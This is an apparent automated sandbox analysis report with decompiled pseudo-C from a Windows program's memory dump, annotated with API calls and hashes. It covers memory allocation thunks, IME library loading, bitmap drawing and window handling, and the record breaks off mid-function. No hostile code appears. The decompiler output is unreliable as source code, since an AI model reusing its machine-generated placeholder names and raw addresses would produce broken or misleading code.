                                  				void* _t29;
                                  				intOrPtr* _t48;
                                  				void _t52;
                                  
                                  				_t48 =  &_v16;
                                  				if( *0x4bc888 == 0) {
                                  					_t29 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                  					_v12 = _t29;
                                  					_t52 =  *0x4bc884; // 0x3a0000
                                  					 *_v12 = _t52;
                                  					E00402D04(0x4a05d4, 2, _v12 + 4);
                                  					 *((intOrPtr*)(_v12 + 6)) = E0042606C(_v12 + 5, E0042604C);
                                  					 *_t48 = _v12 + 0xa;
                                  					do {
                                  						 *((char*)( *_t48)) = 0xe8;
                                  						 *((intOrPtr*)( *_t48 + 1)) = E0042606C( *_t48, _v12 + 4);
                                  						 *((intOrPtr*)( *_t48 + 5)) =  *0x4bc888;
                                  						 *0x4bc888 =  *_t48;
                                  						 *_t48 =  *_t48 + 0xd;
                                  					} while ( *_t48 - _v12 < 0xffc);
                                  					 *0x4bc884 = _v12;
                                  				}
                                  				_v8 =  *0x4bc888;
                                  				 *_t48 =  *0x4bc888;
                                  				 *0x4bc888 =  *((intOrPtr*)( *_t48 + 5));
                                  				_t27 =  *_t48;
                                  				 *((intOrPtr*)(_t27 + 5)) = _a4;
                                  				 *((intOrPtr*)(_t27 + 9)) = _a8;
                                  				return _v8;
                                  			}











                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042609B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 56dfab6c750fd57e46d69d2ab6e01a6fe5c0c227b2529122c7062c8c1ecf4a2f
                                  • Instruction ID: c5320d0a2ad2eb67cea62fd777001988c1f43def9419e51c769c5e3a792bff3c
                                  • Opcode Fuzzy Hash: 56dfab6c750fd57e46d69d2ab6e01a6fe5c0c227b2529122c7062c8c1ecf4a2f
                                  • Instruction Fuzzy Hash: 0B31D374A00219DFCB10DF98D4C1F89BBF0EF49314F1582AAE688EB3A5D375A941CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004018F8(void* __eax, void** __ecx, intOrPtr __edx) {
                                  				intOrPtr _t20;
                                  				int _t35;
                                  				signed int* _t38;
                                  				intOrPtr* _t44;
                                  				void** _t45;
                                  				intOrPtr* _t49;
                                  
                                  				 *_t49 = __edx;
                                  				_t45 = _t49 + 8;
                                  				_t44 = _t49 + 4;
                                  				_t38 = _t49 + 0xc;
                                  				 *(_t49 + 0x10) = __eax + 0x00000fff & 0xfffff000;
                                  				 *(_t49 + 0x14) = __eax +  *_t49 & 0xfffff000;
                                  				 *__ecx =  *(_t49 + 0x10);
                                  				__ecx[1] =  *(_t49 + 0x14) -  *(_t49 + 0x10);
                                  				_t20 =  *0x4bc5ec; // 0x2641b4
                                  				 *_t44 = _t20;
                                  				while(0x4bc5ec !=  *_t44) {
                                  					_t10 =  *_t44 + 8; // 0x0
                                  					 *_t45 =  *_t10;
                                  					 *_t38 =  *((intOrPtr*)( *_t44 + 0xc)) +  *_t45;
                                  					if( *_t45 <  *(_t49 + 0x10)) {
                                  						 *_t45 =  *(_t49 + 0x10);
                                  					}
                                  					if( *_t38 >  *(_t49 + 0x14)) {
                                  						 *_t38 =  *(_t49 + 0x14);
                                  					}
                                  					if( *_t45 <  *_t38) {
                                  						_t35 = VirtualFree( *_t45,  *_t38 -  *_t45, 0x4000); // executed
                                  						if(_t35 == 0) {
                                  							 *0x4bc5c8 = 2;
                                  						}
                                  					}
                                  					 *_t44 =  *((intOrPtr*)( *_t44));
                                  				}
                                  				return 0x4bc5ec;
                                  			}










                                  APIs
                                  • VirtualFree.KERNEL32(?,?,00004000), ref: 00401988
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 4a0dd554ff3172814904fd10d83be2f86fea215b62cf821b40949e3dd13a0c6e
                                  • Instruction ID: b5b19fb004b1513b500f8dd7953e53b640de4c8ae482cc9aae1b4219d938cf5a
                                  • Opcode Fuzzy Hash: 4a0dd554ff3172814904fd10d83be2f86fea215b62cf821b40949e3dd13a0c6e
                                  • Instruction Fuzzy Hash: 0B21DDB5204202DFC750CF28D8C0A5AB7E4FF99314B20496AE998DB364D334E909CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 83%
                                  			E0045200C() {
                                  				int _v8;
                                  				intOrPtr _t4;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t15;
                                  				struct HINSTANCE__* _t17;
                                  				struct HINSTANCE__* _t19;
                                  				struct HINSTANCE__* _t21;
                                  				struct HINSTANCE__* _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HINSTANCE__* _t27;
                                  				struct HINSTANCE__* _t29;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  
                                  				_t42 = _t44;
                                  				_t4 =  *0x4bb254; // 0x4bc744
                                  				if( *((char*)(_t4 + 0xc)) == 0) {
                                  					return _t4;
                                  				} else {
                                  					_v8 = SetErrorMode(0x8000);
                                  					_push(_t42);
                                  					_push(0x452172);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t44;
                                  					if( *0x4bcb30 == 0) {
                                  						 *0x4bcb30 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                  					}
                                  					if( *0x4a0e14 == 0) {
                                  						 *0x4a0e14 = LoadLibraryA("imm32.dll");
                                  						if( *0x4a0e14 != 0) {
                                  							_t11 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb34 = GetProcAddress(_t11, "ImmGetContext");
                                  							_t13 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb38 = GetProcAddress(_t13, "ImmReleaseContext");
                                  							_t15 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb3c = GetProcAddress(_t15, "ImmGetConversionStatus");
                                  							_t17 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb40 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                  							_t19 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb44 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                  							_t21 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb48 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                  							_t23 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb4c = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                  							_t25 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb50 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                  							_t27 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb54 = GetProcAddress(_t27, "ImmIsIME");
                                  							_t29 =  *0x4a0e14; // 0x0
                                  							 *0x4bcb58 = GetProcAddress(_t29, "ImmNotifyIME");
                                  						}
                                  					}
                                  					_pop(_t40);
                                  					 *[fs:eax] = _t40;
                                  					_push(0x452179);
                                  					return SetErrorMode(_v8);
                                  				}
                                  			}



















                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 00452025
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00452172,?,00008000), ref: 00452049
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,00452172,?,00008000), ref: 00452056
                                  • LoadLibraryA.KERNEL32(imm32.dll), ref: 00452072
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 00452094
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520A9
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520BE
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520D3
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520E8
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172), ref: 004520FD
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000), ref: 00452112
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00452127
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0045213C
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00452151
                                  • SetErrorMode.KERNEL32(?,00452179,00008000), ref: 0045216C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-3950384806
                                  • Opcode ID: 0a7273cfec4f02dc86132beaee21e22f38da2187c8236c01cddb6d993c9dac67
                                  • Instruction ID: 9ae67bee77e18cc622bbf1c567346d40709719c033d8274d3456cfc1f0479237
                                  • Opcode Fuzzy Hash: 0a7273cfec4f02dc86132beaee21e22f38da2187c8236c01cddb6d993c9dac67
                                  • Instruction Fuzzy Hash: CD3150F1605344AFDB00DFA5AE86A1B3BE8E706705B11093BBA01D7292D6FC7814CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0042CA18(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                                  				struct HBITMAP__* _v8;
                                  				struct HPALETTE__* _v12;
                                  				struct HPALETTE__* _v16;
                                  				struct HPALETTE__* _v20;
                                  				void* _v24;
                                  				struct HDC__* _v28;
                                  				struct HDC__* _v32;
                                  				struct HDC__* _v36;
                                  				BITMAPINFO* _v40;
                                  				void* _v44;
                                  				intOrPtr _v48;
                                  				struct tagRGBQUAD _v52;
                                  				struct HPALETTE__* _v56;
                                  				intOrPtr _v116;
                                  				intOrPtr _v120;
                                  				intOrPtr _v132;
                                  				intOrPtr _v136;
                                  				void _v140;
                                  				struct tagRECT _v156;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed short _t229;
                                  				int _t281;
                                  				signed int _t290;
                                  				signed short _t292;
                                  				struct HBRUSH__* _t366;
                                  				struct HPALETTE__* _t422;
                                  				signed int _t441;
                                  				intOrPtr _t442;
                                  				intOrPtr _t444;
                                  				intOrPtr _t445;
                                  				void* _t455;
                                  				void* _t457;
                                  				void* _t459;
                                  				intOrPtr _t460;
                                  
                                  				_t423 = __ecx;
                                  				_t457 = _t459;
                                  				_t460 = _t459 + 0xffffff68;
                                  				_push(_t419);
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v20 = 0;
                                  				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                                  					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                                  						E0042C5D4(_v8);
                                  						_v116 = 0;
                                  						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                                  							E004297B4();
                                  						}
                                  						_v28 = E004298D4(GetDC(0));
                                  						_v32 = E004298D4(CreateCompatibleDC(_v28));
                                  						_push(_t457);
                                  						_push(0x42d066);
                                  						_push( *[fs:edx]);
                                  						 *[fs:edx] = _t460;
                                  						if( *(_a8 + 0x18) >= 0x28) {
                                  							_v40 = E00402AE4(0x42c, _t423, 0);
                                  							_push(_t457);
                                  							_push(0x42cd70);
                                  							_push( *[fs:edx]);
                                  							 *[fs:edx] = _t460;
                                  							 *(_a8 + 0x18) = 0x28;
                                  							 *((short*)(_a8 + 0x24)) = 1;
                                  							if( *(_a8 + 0x26) == 0) {
                                  								_t290 = GetDeviceCaps(_v28, 0xc);
                                  								_t292 = GetDeviceCaps(_v28, 0xe);
                                  								_t419 = _t290 * _t292;
                                  								 *(_a8 + 0x26) = _t290 * _t292;
                                  							}
                                  							memcpy(_v40, _a8 + 0x18, 0xa << 2);
                                  							 *(_a8 + 4) =  *(_a8 + 0x1c);
                                  							_t441 = _a8;
                                  							 *(_t441 + 8) =  *(_a8 + 0x20);
                                  							if( *(_a8 + 0x26) > 8) {
                                  								_t229 =  *(_a8 + 0x26);
                                  								if(_t229 == 0x10) {
                                  									L30:
                                  									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                                  										E0042C9CC(_a8);
                                  										_t104 =  &(_v40->bmiColors); // 0x29
                                  										_t441 = _t104;
                                  										E00402D04(_a8 + 0x40, 0xc, _t441);
                                  									}
                                  								} else {
                                  									_t441 = _a8;
                                  									if(_t229 == 0x20) {
                                  										goto L30;
                                  									}
                                  								}
                                  							} else {
                                  								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                                  									if(_v16 == 0) {
                                  										if(_v8 != 0) {
                                  											_v24 = SelectObject(_v32, _v8);
                                  											if(_v116 <= 0 || _v120 == 0) {
                                  												asm("cdq");
                                  												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                                  											} else {
                                  												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                                  												_t441 = _a8;
                                  												 *(_t441 + 0x38) = _t281;
                                  											}
                                  											SelectObject(_v32, _v24);
                                  										}
                                  									} else {
                                  										_t76 =  &(_v40->bmiColors); // 0x29
                                  										_t441 = _t76;
                                  										E0042A074(_v16, 0xff, _t441);
                                  									}
                                  								} else {
                                  									_t441 = 0;
                                  									_v40->bmiColors = 0;
                                  									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                                  								}
                                  							}
                                  							_v20 = E004298D4(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                                  							if(_v44 == 0) {
                                  								E0042982C(_t419);
                                  							}
                                  							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                                  								_pop(_t442);
                                  								 *[fs:eax] = _t442;
                                  								_push(0x42cd77);
                                  								return E00402B14(_v40);
                                  							} else {
                                  								asm("cdq");
                                  								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                                  								E00403E98();
                                  								E00403E98();
                                  								goto L58;
                                  							}
                                  						} else {
                                  							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                                  								_v20 = E004298D4(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                                  							} else {
                                  								_v20 = E004298D4(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                                  							}
                                  							E004298D4(_v20);
                                  							_v24 = E004298D4(SelectObject(_v32, _v20));
                                  							_push(_t457);
                                  							_push(0x42d017);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t460;
                                  							_push(_t457);
                                  							_push(0x42d006);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t460;
                                  							_v56 = 0;
                                  							_t422 = 0;
                                  							if(_v16 != 0) {
                                  								_v56 = SelectPalette(_v32, _v16, 0);
                                  								RealizePalette(_v32);
                                  							}
                                  							_push(_t457);
                                  							_push(0x42cfe4);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t460;
                                  							if(_a4 == 0) {
                                  								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                                  							} else {
                                  								_t366 = E00428C98( *((intOrPtr*)(_a4 + 0x14)));
                                  								E0041B1E4(0, _t422,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
                                  								FillRect(_v32,  &_v156, _t366);
                                  								SetTextColor(_v32, E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                  								SetBkColor(_v32, E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14)))));
                                  								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                                  									_v52 = E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                                  									_v48 = E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14))));
                                  									SetDIBColorTable(_v32, 0, 2,  &_v52);
                                  								}
                                  							}
                                  							if(_v8 == 0) {
                                  								_pop(_t444);
                                  								 *[fs:eax] = _t444;
                                  								_push(0x42cfeb);
                                  								if(_v16 != 0) {
                                  									return SelectPalette(_v32, _v56, 0xffffffff);
                                  								}
                                  								return 0;
                                  							} else {
                                  								_v36 = E004298D4(CreateCompatibleDC(_v28));
                                  								_push(_t457);
                                  								_push(0x42cfba);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t460;
                                  								_t455 = E004298D4(SelectObject(_v36, _v8));
                                  								if(_v12 != 0) {
                                  									_t422 = SelectPalette(_v36, _v12, 0);
                                  									RealizePalette(_v36);
                                  								}
                                  								if(_a4 != 0) {
                                  									SetTextColor(_v36, E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                  									SetBkColor(_v36, E00427FD0(E00428C5C( *((intOrPtr*)(_a4 + 0x14)))));
                                  								}
                                  								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                                  								if(_v12 != 0) {
                                  									SelectPalette(_v36, _t422, 0xffffffff);
                                  								}
                                  								E004298D4(SelectObject(_v36, _t455));
                                  								_pop(_t445);
                                  								 *[fs:eax] = _t445;
                                  								_push(0x42cfc1);
                                  								return DeleteDC(_v36);
                                  							}
                                  						}
                                  					} else {
                                  						goto L58;
                                  					}
                                  				} else {
                                  					L58:
                                  					return _v20;
                                  				}
                                  			}


                                  APIs
                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 0042CA98
                                  • GetDC.USER32(00000000), ref: 0042CAA9
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0042CABA
                                  • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042CB06
                                  • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0042CB2A
                                  • SelectObject.GDI32(?,?), ref: 0042CD87
                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0042CDC7
                                  • RealizePalette.GDI32(?), ref: 0042CDD3
                                  • SetTextColor.GDI32(?,00000000), ref: 0042CE3C
                                  • SetBkColor.GDI32(?,00000000), ref: 0042CE56
                                  • SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042CE9E
                                  • FillRect.USER32(?,?,00000000), ref: 0042CE24
                                    • Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 0042CEC0
                                  • CreateCompatibleDC.GDI32(00000028), ref: 0042CED3
                                  • SelectObject.GDI32(?,00000000), ref: 0042CEF6
                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0042CF12
                                  • RealizePalette.GDI32(?), ref: 0042CF1D
                                  • SetTextColor.GDI32(?,00000000), ref: 0042CF3B
                                  • SetBkColor.GDI32(?,00000000), ref: 0042CF55
                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042CF7D
                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042CF8F
                                  • SelectObject.GDI32(?,00000000), ref: 0042CF99
                                  • DeleteDC.GDI32(?), ref: 0042CFB4
                                    • Part of subcall function 00428C98: CreateBrushIndirect.GDI32(?), ref: 00428D42
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                  • String ID:
                                  • API String ID: 1299887459-0
                                  • Opcode ID: 68446657e17cbf7424031cc112ad039a7a9c60e921f431293f22cdcdefd7dad1
                                  • Instruction ID: a104fc63766089e9acbe7141db68acdfa28394ef422aaaf72885006a8d84f5f4
                                  • Opcode Fuzzy Hash: 68446657e17cbf7424031cc112ad039a7a9c60e921f431293f22cdcdefd7dad1
                                  • Instruction Fuzzy Hash: AC12F971A00218AFDB00DFA9D985F9E77B8EF08314F558066F918EB291C778ED40CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004635DC(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				char _v12;
                                  				intOrPtr _t149;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  				intOrPtr _t160;
                                  				intOrPtr _t162;
                                  				intOrPtr _t163;
                                  				void* _t165;
                                  				struct HWND__* _t166;
                                  				long _t176;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				long _t220;
                                  				intOrPtr _t226;
                                  				int _t231;
                                  				intOrPtr _t232;
                                  				intOrPtr _t241;
                                  				intOrPtr _t245;
                                  				signed int _t248;
                                  				intOrPtr _t251;
                                  				intOrPtr _t252;
                                  				signed int _t258;
                                  				long _t259;
                                  				intOrPtr _t262;
                                  				intOrPtr _t266;
                                  				signed int _t269;
                                  				intOrPtr _t270;
                                  				intOrPtr _t271;
                                  				signed int _t277;
                                  				long _t278;
                                  				intOrPtr _t281;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				long _t290;
                                  				intOrPtr _t294;
                                  				struct HWND__* _t299;
                                  				signed int _t301;
                                  				signed int _t302;
                                  				signed int _t305;
                                  				signed int _t307;
                                  				long _t308;
                                  				signed int _t311;
                                  				signed int _t313;
                                  				long _t314;
                                  				signed int _t317;
                                  				signed int _t318;
                                  				signed int _t326;
                                  				long _t328;
                                  				intOrPtr _t331;
                                  				intOrPtr _t362;
                                  				long _t370;
                                  				void* _t372;
                                  				void* _t373;
                                  				intOrPtr _t374;
                                  
                                  				_t372 = _t373;
                                  				_t374 = _t373 + 0xfffffff8;
                                  				_v12 = 0;
                                  				_v8 = __eax;
                                  				_push(_t372);
                                  				_push(0x463b46);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                  					_t294 =  *0x4bb240; // 0x42642c
                                  					E0040656C(_t294, 0,  &_v12);
                                  					E0040CAC4(_v12, 1);
                                  					E00403DEC();
                                  				}
                                  				_t149 =  *0x4bcb7c; // 0x1c41284
                                  				E00467EA8(_t149);
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                  				_push(_t372);
                                  				_push(0x463b29);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                  					_t155 = _v8;
                                  					_t378 =  *((char*)(_t155 + 0x1a6));
                                  					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                  						_push(_t372);
                                  						_push(0x463a30);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E00403814(_v8, __eflags);
                                  						 *[fs:eax] = 0;
                                  						_t160 =  *0x4bcb80; // 0x1c40e90
                                  						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                  						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                  							__eflags = 0;
                                  							E00462788(_v8, 0);
                                  						}
                                  						_t162 = _v8;
                                  						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                  						if( *((char*)(_t162 + 0x22f)) != 1) {
                                  							_t163 = _v8;
                                  							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                  							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                  								_t299 = 0;
                                  								_t165 = E0044D590(_v8);
                                  								_t166 = GetActiveWindow();
                                  								__eflags = _t165 - _t166;
                                  								if(_t165 == _t166) {
                                  									_t176 = IsIconic(E0044D590(_v8));
                                  									__eflags = _t176;
                                  									if(_t176 == 0) {
                                  										_t299 = E0045E3A4(E0044D590(_v8));
                                  									}
                                  								}
                                  								__eflags = _t299;
                                  								if(_t299 == 0) {
                                  									ShowWindow(E0044D590(_v8), 0);
                                  								} else {
                                  									SetWindowPos(E0044D590(_v8), 0, 0, 0, 0, 0, 0x97);
                                  									SetActiveWindow(_t299);
                                  								}
                                  							} else {
                                  								SetWindowPos(E0044D590(_v8), 0, 0, 0, 0, 0, 0x97);
                                  							}
                                  						} else {
                                  							E0044AAE8(_v8);
                                  						}
                                  					} else {
                                  						_push(_t372);
                                  						_push(0x463694);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E00403814(_v8, _t378);
                                  						 *[fs:eax] = 0;
                                  						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                  							if( *((char*)(_v8 + 0x22f)) != 1) {
                                  								_t301 = E00464E70() -  *(_v8 + 0x48);
                                  								__eflags = _t301;
                                  								_t302 = _t301 >> 1;
                                  								if(_t301 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t198 = E00464E64() -  *(_v8 + 0x4c);
                                  								__eflags = _t198;
                                  								_t199 = _t198 >> 1;
                                  								if(_t198 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							} else {
                                  								_t241 =  *0x4bcb7c; // 0x1c41284
                                  								_t305 = E00446748( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                  								_t302 = _t305 >> 1;
                                  								if(_t305 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t245 =  *0x4bcb7c; // 0x1c41284
